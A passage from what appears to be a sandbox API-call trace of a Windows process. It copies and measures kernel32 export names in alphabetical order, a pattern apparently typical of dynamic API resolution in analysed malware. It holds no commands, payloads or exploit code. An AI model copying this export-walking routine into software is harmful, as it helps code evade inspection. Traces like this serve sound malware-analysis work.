returned="BuildCommDCBAndTimeoutsA" [0084.554] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.554] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.554] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.555] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.555] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.555] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.555] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.555] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.555] lstrlenA (lpString="CANCELIO") returned 8 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.555] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.555] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.555] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.555] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.555] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.555] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.555] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.555] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.555] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.555] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.555] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.555] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.555] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.556] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.556] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.556] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.556] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.556] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.556] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.556] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.556] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.556] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.556] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.556] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.556] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.556] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.556] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.556] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.556] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.556] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.556] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.556] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.556] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.557] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.557] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.557] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.557] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.557] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.557] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.557] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.557] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.557] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.557] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.557] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.557] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.557] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.557] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.557] lstrlenA (lpString="COPYFILEA") returned 9 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.557] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.557] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.557] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.557] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.557] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.558] lstrlenA (lpString="COPYFILEW") returned 9 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.558] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.558] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.558] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.558] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.558] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.558] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.558] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.558] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.558] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.558] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.558] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.558] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.558] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.558] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.558] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.558] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.558] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.558] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.559] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.559] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.559] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.559] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.559] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.559] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.559] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.559] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.559] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.559] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.559] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.559] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.559] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.559] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.559] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.559] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.559] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.559] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.559] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.559] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.560] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.560] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.560] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.560] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.560] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.560] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.560] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.560] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.560] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.560] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.560] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.560] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.560] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.560] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.560] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.560] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.560] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.560] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.560] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.561] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.561] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.561] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.561] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.561] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.561] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.561] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.561] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.561] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.561] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.561] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.561] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.561] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.561] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.561] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.561] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.561] 